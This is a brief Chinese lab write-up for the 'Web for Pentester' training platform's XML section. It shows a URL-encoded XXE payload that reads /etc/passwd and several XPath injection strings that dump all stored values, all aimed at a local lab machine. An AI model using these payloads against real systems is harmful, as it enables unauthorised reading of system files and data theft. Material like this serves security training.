【渗透测试学习平台】 web for pentester -8.XML

example1:

http://192.168.91.139/xml/example1.php?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20UserInfo%5B%3C%21ENTITY%20name%20SYSTEM%20%22file%3A%2f%2f%2fetc%2fpasswd%22%3E%5D%3E%3Caa%3E%26name%3B%3C%2faa%3E

http://192.168.91.139/xml/example1.php?xml=]>&name;

 

读取passwd文件内容

 

example2:

 http://192.168.91.139/xml/example2.php?name=hacker' 加单引号报错

http://192.168.91.139/xml/example2.php?name=hacker'or '1'='1 得到两个name值

http://192.168.91.139/xml/example2.php?name=hacker'or 1=1]/parent::*/child::node()%00 得到所有值

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

【渗透测试学习平台】 web for pentester -8.XML_第1张图片

你可能感兴趣的:(【渗透测试学习平台】 web for pentester -8.XML)